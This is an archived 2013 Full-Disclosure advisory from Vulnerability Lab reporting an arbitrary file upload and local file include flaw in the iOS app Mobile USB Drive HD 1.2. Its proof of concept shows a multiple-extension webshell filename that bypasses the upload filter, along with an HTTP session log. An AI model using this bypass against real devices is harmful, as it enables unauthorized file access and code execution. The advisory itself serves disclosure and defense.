[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Mobile USB Drive HD 1.2 - Arbitrary File Upload Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-06-27 23:42:03
Message-ID: 51CCCDCB.5080707 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
Mobile USB Drive HD 1.2 - Arbitrary File Upload Vulnerability
Date:
=====
2013-06-27
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=989
VL-ID:
=====
989
Common Vulnerability Scoring System:
====================================
6.8
Introduction:
=============
Mobile Drive is a Powerful tool that allows you to quickly store and view files. you can \
transfer files between PC/MAC and your device via WiFi, iTunes USB, FTP and iCloud. No more \
worries about losing important files again!
File Manager
- Global File Search
- Folder and sub-folder support
- Move, rename, copy, delete, zip files and folders
- Extract ZiP files
- Sorting by name, date, size
File viewer
- PDF Viewer (support bookmark, thumbnail, AirPrint)
- Full-Featured Photo Viewer
- Document viewer supports Word, Excel, PPT, PDF, iWork, html, txt, rtf, webarchive file \
formats
- Video player support mp4, mov, 3gp, m4v formats
- Open files in other apps
File Transfer and Backup
- Wirelessly transfer files via Wifi
- FTP File Transfer support (easily download, upload, rename, and delete files and folders)
- iTunes USB File Sharing support (the fastest and the easiest way)
- Access and edit files with different devices via iCloud
- Transfer files via Email
- File Backup:Wifi, iTunes USB, FTP, Open-In, iCloud
Password Protection Feature, three choices
• 4-digit password
• character password
• gestures password
(Copy of the Vendor Homepage: \
https://itunes.apple.com/us/app/mobile-usb-drive-for-iphone/id622590148 )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the Mobile \
USB Drive HD v1.2 apple iOS application.
Report-Timeline:
================
2013-06-27: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Apple AppStore
Product: Mobile USB Drive HD 1.2
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
A local file include and arbitrary file upload web vulnerability via POST method request is \
detected in the Mobile USB Drive HD v1.2 apple iOS application. The vulnerability allows remote \
attackers via POST method to upload files with multiple extensions to unauthorized access them \
on application-side of the service.
The vulnerability is located in the upload file module of the web-server \
(http://localhost:8080/) when processing to request a manipulated filename via POST. The \
execution of the injected path or file request will occur when the attacker/target is \
processing to reload to index listing of the affected module. Remote attackers can exchange \
the filename with a tripple extension to bypass the filter and can execute the files located \
on the little web-server of the application.
Exploitation of the vulnerability requires no user interaction and also without application \
user account (no password standard). Successful exploitation of the vulnerability results in \
unauthorized path or file access via local file include or arbitrary file upload.
Vulnerable Application(s):
[+] Mobile USB Drive HD v1.2 - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] File Upload (Web Server) [Remote]
Vulnerable Parameter(s):
[+] filename
[+] file extensions (multiple)
Affected Module(s):
[+] MUD HD Index Listing
Proof of Concept:
=================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user \
interaction or privilege application user account. For demonstration or reproduce ...
PoC: http://localhost:8080/files/webshell-js.php.png.txt.iso.php.gif
Review: File Management.htm - Index
<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist">
<tr><td><a href="http://localhost:8080/files/webshell-js.php.png.txt.iso.php.gif" \
class="file">webshell-js.php.png.txt.iso.php.gif</a></td>
--- Session Log ---
21:01:24.132[0ms][total 0ms]
Status: pending[]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif Load Flags[LOAD_DOCUMENT_URI \
LOAD_INITIAL_DOCUMENT_URI ] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:8080/]
21:01:32.643[0ms][total 0ms]
Status: pending[]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif Load Flags[VALIDATE_ALWAYS \
LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:8080/]
21:01:43.184[125ms][total 177ms]
Status: 200[OK]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[98139] \
Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:8080/]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Accept-Ranges[bytes]
Content-Length[98139]
Date[Do., 27 Jun 2013 19:06:58 GMT]
21:01:43.389[2393ms][total 2393ms]
Status: 200[OK]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif
Load Flags[LOAD_NORMAL] Content Size[98139] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[98139]
Date[Do., 27 Jun 2013 19:07:00 GMT]
Risk:
=====
1.1
The security risk of the arbitrary file upload vulnerability and the multiple extensions issue \
are estimated as high.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - \
research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - \
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to \
get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic